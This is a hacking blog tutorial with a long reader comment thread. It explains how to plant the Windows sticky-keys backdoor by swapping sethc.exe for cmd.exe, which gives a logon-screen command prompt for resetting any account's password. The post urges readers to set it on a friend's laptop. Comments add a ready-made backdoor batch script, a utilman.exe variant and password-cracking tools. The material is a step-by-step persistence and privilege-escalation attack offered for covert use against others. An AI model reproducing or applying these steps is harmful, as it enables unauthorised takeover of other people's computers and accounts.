Lets assume that you have just cracked victim's windows password.  or simply got access to his windows for some time.Can you make some changes in windows so that you could access the windows again even if victim changes the password ?? or Can you make any changes in your own windows so that you could access it anytime even if anybody sets/changes password ?
Simply Can we set a backdoor in windows ?
Yes we can :) .
Backdoor actually means maintaining access.
okay lets do one thing first. Open your command prompt (run as administrator in win 7/vista).

Type the following command :

Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.



Hopefully your new password must have been set. did you notice one thing ? It didn't ask you to confirm old password. Now suppose if anyhow we manage to access command prompt at logon screen (without logging in), we can easily change/clear password.  
Okay lets move on.
Now press shift key five times and you must have got a dialog box "sticky keys" on screen.

Sticky keys is a feature that makes it easy for users who have physical  disablilities to press multiple keys at time.   This is the only feature which can be used before logging in at logon screen ( as per my knowledge). I repeat this feature can be used at  logon screen by pressing shift key five times.
Whenevr we start an application like paint, we are actually running mspaint.exe placed in C:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file
sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
But you just cant simply rename it or change system32 files. Follow the tutorial for that.

 Tutorial :


* Go to C:\windows\system32
* Copy cmd.exe on your desktop and rename it to sethc.exe .
*Now copy that file and paste again in system32 directory.

@ Windows XP Users


Hopefully existing orignal sethc.exe must have been replaced and your job is done. Now press shift five times and you would see command prompt on screen.You can access command prompt at windows logon screen and change/clear the password easily using "net user" command.

Note: You can also do these changes while using windows Guest Account. But when you would access command prompt at logon screen, you can change/clear password even of administrator's account. This is exactly how , we can hack into administrator's account through guest account.

@ Windows vista/7 Users


You must have got a pop up box saying "Access Denied".


Actually you can not change system32 directory files until you do not have the permissions. You can not have the permissions until you do not have the ownership. So lets take ownership, change permissions, just follow the steps.

1. Right click on sethc.exe and run as administrator.  Again right click on sethc.exe, open properties.
Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.





2. Then click on 'Edit' in security tab to edit permissions. Click on 'Administrators' , give it full control
and apply changes.

Okay its done now.

Now try replacing the orignal sethc.exe with our sethc.exe (got by renaming cmd.exe).
Press shift key five times and hopefully you would get command prompt on the screen instead of sticky keys.

Enjoy Command prompt at logon screen...

So do not forget to set this backdoor whenever you would get friend's  laptop for a few minutes... :)

58 comments:

Post a Comment
  1. done and accomplish!!!:D
    but is there anyways to log in without changing the owner password???

  2. For that , we would have to crack his existing password using live CDs. Read more here
    http://www.explorehacking.com/2011/01/windows-logon-password-how-crackers.html

  3. u mean using ophcrack right???
    i have tried on some place n it is realy work...
    but unfortunatelt i doesn't work on my laptop...
    why is it??

  4. Yeah, oph crack. I have used this a few times and has worked for me. I cant say , why it dint work on your laptop. Did you get any error or what ?

  5. wen i used oph crack i dinyt get exact passwords which are saved... actually i used it on my own lappi... but it showed some random passwords like WuHJJJ57KKKpld.... and many such things... i used KRYPTON based oph crack cd

  6. does not work for me ........
    i followed all the steps mentioned by u....
    i replaced sethc.exe but still m able to use sticky keys... i.e cmd doesnot pop out .... m using xp

  7. Hi,i have a problem.whenever i try to give new password.an error comes.
    saying..........
    "c:\windows\system32>net user administrator *
    type a password for the user:(i tried to type the password but it was not showing the values)
    retype the password to confirm:
    system error 5 has occured.

    Access is denied."

  8. @anonymous, mention query in detail

    @Mit Run command prompt as administrator. "Run as administrator"

  9. does not work for me too ........
    i followed all the steps mentioned by u....
    still i could not replace the original sethc.exe file with the new one(the cmd.exe renamed) on windows 7 home basic

  10. nice starting dude.. Now start some real thing like tutorials on win32 exploit writing and so on

  11. Do you have to delete the original sethc.exe on Vista when you rename and paste the cmd.exe (now called sethc.exe)into \system32? Or does it automatically get overwritten by the cmd version?

    Cheers in advance.

  12. On Vista do you have to delete the original sethc.exe after pasting the cmd version into \system32 or is it automatically overwritten?

  13. JHV

  14. that's a crap...if we will have the privilege to change the permission then no need to hack the machine ...dude....tell me how to crack the admin account if only guest account is allowed and that too is parental controlled

  15. how can i change when i dont have administrative privilege

  16. This comment has been removed by the author.
  17. You can not do this through a guest account in Win 7. Its possible only in win XP.

  18. hi even i'm facing the same problem as mit run...when i type the password & press enter..it says "access is denied...system error 5 has occurred".

    i didnt understand what you meant by Run command prompt as administrator. "Run as administrator".. please can you explain how to do it?

    thanks a lot..

  19. works like a charm!! nice work!! :) thanks :D

  20. Fantastic.. :D


    worked for me... thank you.. i want this today and got it here.. thnks

  21. nice job. but can do it more wisely...

  22. i am having problems copying the new sethc.exe into sys32 folder it says 'access is denied make sure the disk is not full or write protected and the file is currently in use' so what should i do?

  23. awsome 4 me wrkd first time very clever man

  24. thank for your valuable information.I have implemented it and got the desired result..

  25. "does not work for me ........
    i followed all the steps mentioned by u....
    i replaced sethc.exe but still m able to use sticky keys... i.e cmd doesnot pop out .... m using xp"
    - make sure that if your file extension is hidden, you don't add the .exe i.e. just rename it as sethc

  26. Not working for........... i m unable to copy sethc file on original sethc file......... on win 7 ultimate.

  27. nice..
    to learn more about windows hacking,web hacking cyber security visit my blog at
    www.almashackingtutorials.blogspot.com

  28. Hurrey...those who r facing problem specially in win7 contact me admin@techalexa.com ...I got it.can help u by email

  29. I am unable to do this for a user account with some name like Sai Teja and the error it is showing is "
    "
    C:\Documents and Settings\Sai>net user Sai Teja *
    The syntax of this command is:


    NET USER
    [username [password | *] [options]] [/DOMAIN]
    username {password | *} /ADD [options] [/DOMAIN]
    username [/DELETE] [/DOMAIN]
    "

    Can u tell me what should I do for this ?

  30. after getting cmd on logon screen how to log in to s/m??

  31. after getting cmd on logon screen how to log in to s/m

  32. Hey Dear users my commanD prompT is disable and donot recover throug anything i have scaned with many antiviruses but doesnot work so what i can I Doo to retain it! :s

    and dou u hearD this malware malware-win32.classid-61348

  33. after cmd prompt on screen just type
    net user // to see usernames
    net user < name > *

    and enter password which will not show u but u can enter

  34. cd\
    c:
    cd windows
    cd system32
    copy cmd.exe d:
    this is bat file to make backdoor in XP copy it-

    cd\
    d:
    ren cmd.exe sethc.exe
    c:
    cd\
    cd windows
    cd system32
    ren sethc.exe my.exe
    cd\
    d:
    copy sethc.exe C:\Windows\System32
    @echo Backdoor have been Created
    @echo on
    @echo You can change it By same commands as net user administrator *
    pause

    and save it as backdoor.bat works in Xp only

  35. I am unable to do this for a user account with some name like Sai Teja and the error it is showing is "
    "
    C:\Documents and Settings\Sai>net user Sai Teja *
    The syntax of this command is:


    NET USER
    [username [password | *] [options]] [/DOMAIN]
    username {password | *} /ADD [options] [/DOMAIN]
    username [/DELETE] [/DOMAIN]
    "

    Can u tell me what should I do for this ?

  36. Hi
    I got the 'command successfully completed' thing on the command prompt after changing the password. but when I log into the account, I still have to use the old password. Why is that? O.o
    And also I am not able to open command prompt from login screen. Did all the above step, but it just opens the sticky keys window.

  37. What if i want to login a computer whose password is not known by me, and no one has replaced the sethc.exe file in the computer

  38. hi very good tut thanks bro

    how to see r find the windows admin password without help of any software or cd..i jst want to do that by dos

  39. DON'T USE the method if it doesn't work for you guys..
    the best way is to use ophcrack cd or usb method..
    wait for my tutorials about that on pctionary

  40. if i do this with notepad instead of cmd, or even if i use cmd, it will close after a set amount of time. This will happen with anyprogram running on login screen after a while, they will all close at the same time. why is this? i want to run virtual machine software this way, but it closes after about five minuets

  41. my younger sister while fiddling with the administrator account changed its password and forgot...now all i have is a regular account and no access to the admin. account....i would have reinstalled windows but i have very imp files stored in my admin account and the problem worsens when i cant insert a cd as it is net book!!!! plzzz help and save my life!! -samantha

  42. "my younger sister while fiddling with the administrator account changed its password and forgot...now all i have is a regular account and no access to the admin. account...."

    You can try ophcrack but i think that best way is download "NT Offline pasword and Registry editor cd" and remove password. Use that tool only if you are NOT used disk encryption becase if you have encrypted files and does not get right password you lost your files!. That is free program (boot cd) and Google will help you to find it ;-)

  43. @samantha download linux iso image and install to usb, thats what i did for my sisters laptop when it chrashed, use xboot (requires .net framework) to install the iso to a flash drive of some kind. use that to replace sethc.exe in the c:\windows\system32 folder with cmd.exe in the same fodler then when you log in press sift five times and command prompt will pop up....The command for password replacement is "net user {{insert username without curly brases}} {{insert new password}}" if i left something out just tell me darthearon@yahoo.com. hope i can be of service (same guy who posted right before you so if anybody can help with my issue it would be very helpfull)

  44. ok went to this blog looking for a different thing and to the without changing password this way he said here u have to have access to the machine so why not just use opcrack and with that method he said , why not when u pull up cmd at the login however u have that set up i usually do the windows u utilman.exe replacement type explorer and pull up the systems desktop

  45. @anonymous

    "Run as Administrator" is done by rieght clicking the cmd app and selecting the Run as Administrator option.

  46. Not working for me. i m unable to copy sethc file on original sethc file......... on win 7 ultimate.

  47. i'm unable to change it's permission into administrator..

    that's it.

  48. i cannot change my password! after writing
    ner user my-username *
    it let me type a password. after confirming the password it causes and error, that is;

    "System error 5 has occurred.
    Access is denied.
    c:\User\Moinul>"

    now what should I do? please any of you give me the solution plzzzzzzzzzzzzzz plzzzzzzzzzzzzz..

  49. cool hack, although I used Unlocker instead of messing with the permissions.

    1) Copy "sethc.exe" to "sethc.bak"

    2) Use Unlocker to delete original "sethc.exe"

    3) Copy "cmd.exe" to "sethc.exe"

    4) Logout

    5) Tap "Shift" 5 times

    6) once inside CMD prompt, type "start cmd" to bring up a TRUE Administrator prompt.

    7) Have Fun :)

  50. alright im the admin on my pc but when i try to give myself full control i get access denied whats going on?

  51. NICE ONE SIR! :D

  52. thanx..!!!

  53. hi thanks for you tutorial
    but it still keep saying
    system error 5 has occured ...
    what could be the problem?

  54. This is an awesome trick btw. I would also suggest that you keep a copy of sticky keys application in a folder in System in case you want to revert back to original sethc.exe. I don't know why anyone would want to, but you never know. :-)

  55. How did u change it. Mine keeps doing the same message. I cant fix it help please please

  56. I need help with same problem. Please help me

  57. How did u change it. Mine keeps doing the same message. I cant fix it help please please

  58. please reupload all the images

Post a Comment